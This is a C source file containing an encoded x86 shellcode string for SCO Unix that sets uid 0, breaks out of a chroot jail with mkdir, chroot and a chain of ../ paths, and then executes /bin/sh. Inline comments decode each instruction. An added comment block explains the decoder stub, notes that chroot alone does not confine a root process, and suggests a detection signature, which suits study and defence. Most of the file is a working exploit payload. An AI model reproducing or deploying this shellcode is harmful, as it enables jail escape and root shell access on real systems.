
/*
 *  Sco chroot() shellcode by doble@iname.com
 *
 *  - setreuid(0); 
 *  - chroot-break (make a temp dir with mkdir(),
 *    chroot() to tempdir, do a number of ../
 *  - execve of /bin/sh
 *
 */

/*
 * Structure of the byte string below, as documented by the inline
 * comments next to each byte group:
 *
 *   1. A short NOP run and zeroing of %ebx/%ecx, stored as plain x86.
 *   2. The "decode" stub: jmp/call/popl obtains the payload address in
 *      %esi, then a loop of 33 iterations (movb 33,%cl / loop) subtracts
 *      0x10101010 (%edi) from the dword at 1(%esi), advancing %esi by 4
 *      each pass.  The stub itself is stored unencoded.
 *   3. Everything from "start:" onward is stored with that constant
 *      added; the comment beside each group gives the decoded
 *      instruction (e.g. "\x41\xd0" is listed as xorl %eax,%eax, and the
 *      \x10 bytes inside the lcall sequences stand for 0x00).  Each of the
 *      five sections (setuid, mkdir, chroot, chroot, execve) loads a
 *      syscall number into %al and traps via lcall 0x7,0x0.
 *   4. Trailing data: the strings referenced at 0(%esi), 5(%esi) and
 *      8(%esi), also stored in encoded form.
 *
 * Defender's reading: the escape depends on the process already holding
 * uid 0 (the setuid step precedes mkdir/chroot), i.e. chroot() alone does
 * not confine a root process; confinement needs a privilege drop as well.
 * Because only the decode stub is stored in cleartext, a signature for
 * this sample has to key on those stub bytes rather than on the encoded
 * payload or strings.
 *
 * NOTE(review): the header lists setreuid(0) while the section comment
 * below says setuid(0) with syscall number 0x17 - confirm against the
 * target's syscall table before relying on either name.
 */

char shellcode[]=
  "\x90\x90\x90\x90\x90"            // nop x5
  "\x31\xdb"                        // xorl %ebx,%ebx
  "\x31\xc9"                        // xorl %ecx,%ecx

// decode (stored unencoded; runs in place on the bytes from "start:" on)

  "\xeb\x12"                        // jmp A
  "\x5e"                            // B: popl %esi
  "\xbf\x10\x10\x10\x10"            // movl $0x10101010,%edi   (decode constant)
  "\xb1\x21"                        // movb $33,%cl             (dwords to decode)
  "\x29\x7e\x01"                    // subl %edi,1(%esi)
  "\x83\xc6\x04"                    // addl $4,%esi
  "\xe2\xf8"                        // loop
  "\xeb\x05"                        // jmp +5
  "\xe8\xe9\xff\xff\xff"            // A: call B
  "\x90"                            // nop
  "\xfb\x5d"                        // start: jmp uno   (first encoded byte group)
  "\x6e"                            // dos: popl %esi

// setuid(0)   -- see NOTE(review) above: header says setreuid(0)

  "\x41\xd0"                        // xorl %eax,%eax
  "\xc0\x27"                        // movb $0x17,%al
  "\x63"                            // pushl %ebx
  "\x63"                            // pushl %ebx
  "\xaa\x10\x10\x10\x10\x17\x10"    // lcall 0x7,0x0

// mkdir("sh")

  "\x41\xd0"                        // xorl %eax,%eax
  "\xc0\x60"                        // movb $0x50,%al
  "\x9d\x8e\x15"                    // leal 5(%esi),%edi        ("sh")
  "\x67"                            // pushl %edi
  "\x67"                            // pushl %edi
  "\xaa\x10\x10\x10\x10\x17\x10"    // lcall 0x7,0x0

// chroot("sh")

  "\x41\xd0"                        // xorl %eax,%eax
  "\xc0\x4d"                        // movb $0x3d,%al
  "\x9d\x8e\x15"                    // leal 5(%esi),%edi        ("sh")
  "\x67"                            // pushl %edi
  "\x67"                            // pushl %edi
  "\xaa\x10\x10\x10\x10\x17\x10"    // lcall 0x7,0x0

// chroot("../../../../../../../../../../../../");

  "\x41\xd0"                        // xorl %eax,%eax
  "\xc0\x4d"                        // movb $0x3d,%al
  "\x9d\x8e\x18"                    // leal 8(%esi),%edi        ("../" chain)
  "\x67"                            // pushl %edi
  "\x67"                            // pushl %edi
  "\xaa\x10\x10\x10\x10\x17\x10"    // lcall 0x7,0x0

// execve("/bin/sh",0,0);

  "\x41\xd0"                        // xorl %eax,%eax
  "\xc0\x4b"                        // movb $0x3b,%al
  "\x63"                            // pushl %ebx
  "\x63"                            // pushl %ebx 
  "\x66"                            // pushl %esi
  "\x66"                            // pushl %esi
  "\xaa\x10\x10\x10\x10\x17\x10"    // lcall 0x7,0x0

  "\xf8\xbe\x0f\x10\x10"            // uno: call dos

// strings (encoded like the code; \x10 decodes to the NUL terminator)

  "\x3f\x72\x79\x7e\x3f"            // "/bin/"                  // 0(%esi)
  "\x83\x78\x10"                    // "sh\x10"                 // 5(%esi)
  "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f"
  "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f"
  "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f"
  "\x3e\x3e\x3f\x3e\x3e\x3f\x3e\x3e\x3f\x10" 
  // "../../../../../../../../../../../../\x10"    // 8(%esi)
""; //